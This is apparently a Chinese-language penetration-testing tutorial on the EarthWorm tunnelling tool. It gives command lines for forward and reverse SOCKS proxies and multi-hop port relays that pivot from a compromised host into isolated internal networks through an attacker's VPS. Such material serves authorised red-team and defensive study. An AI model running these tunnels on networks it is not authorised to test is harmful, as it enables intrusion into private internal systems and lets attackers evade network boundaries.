【代理篇】内网穿透利器——EarthWorm

0x01 概述

1、工具介绍

EarthWorm是一套便携式的网络穿透工具，具有 SOCKS v5服务架设和端口转发两大核心功能，能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道，直达网络深处，可在复杂网络环境下完成网络穿透。工具包中提供了多种可执行文件，以适用Linux、Windows、MacOS、Arm-Linux 等不同的操作系统。

EarthWorm提供6种功能：

ssocksd  rssocks  rcsocks  lcx_listen  lcx_tran   lcx_slave      //通过-s参数指定

各命令用法解释：

（1）./ew -s ssocksd -l 1080           //开启正向socks服务

（2）./ew -s rcsocks -l 1080 -e 8888      //监听1080端口，1080接收的数据通过8888交互传递

（3）./ew -s rssocks -d rev_ip -e 8888        //开启反向socks服务。反向连接rev_ip的8888端口

（4）./ew -s lcx_listen -l 1080 -e 8888        //监听1080端口，1080接收的数据通过8888交互传递

（5）./ew -s lcx_tran -l 1080 -f forward_ip -g 8888      //监听1080端口，1080接收的数据正向传给forward_ip的8888端口

（6）./ew -s lcx_slave -d vps_ip -e 8888 -f B_ip -g 9999       //作为中间角色，反向连接vps的8888，正向连接B的9999。打通两者

工具使用帮助：

 

0x02 不同场景中的使用

1、目标在公网

 

使用：

（1）目标A：ew_for_win.exe -s ssocksd -l 1080

（2）PC：socks代理连接目标A的1080端口，即可代理近目标内网

效果

 

 

2、目标在内网（能出网）

 

使用：

（1）在vps运行：ew_for_win.exe -s rcsocks -l 1080 -e 8888

（2）在目标A运行：ew_for_win.exe -s rssocks -d vps_ip -e 8888

（3）socks代理连接vps_ip的1080端口，即可代理近目标内网

效果：

 

 

3、目标B在内网（不出网，通出网机器A）

 

（1）A→B正向连接

使用

a.在vps运行：ew_for_win.exe -s lcx_listen -l 1080 -e 8888

b.在目标B运行：ew_for_win.exe -s ssocksd -l 9999

c.在出网机器A运行：ew_for_win.exe -s lcx_slave -d vps_ip -e 8888 -f B_ip -g 9999

效果：

 

 

 

（2）A←B反向连接

使用：

a.在vps运行：ew_for_win.exe -s rcsocks -l 1080 -e 8888

b.在出网机器A运行：ew_for_win.exe -s lcx_tran -l 9999 -f vps_ip -g 8888

c.在目标B运行：ew_for_win.exe -s rssocks -d A_ip -e 9999

效果：

 

 

 

0x03 总结

1、小结

（1）SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供，分别对应正向与反向socks代理。rssocks需要与rcsocks共同使用。

（2）lcx_xxxx用于打通vps和socks服务器之间的链路

（3）-d 8.8.8.8 -e 8888 用于反向连接；-f 8.8.8.8 -g 9999 用于正向连接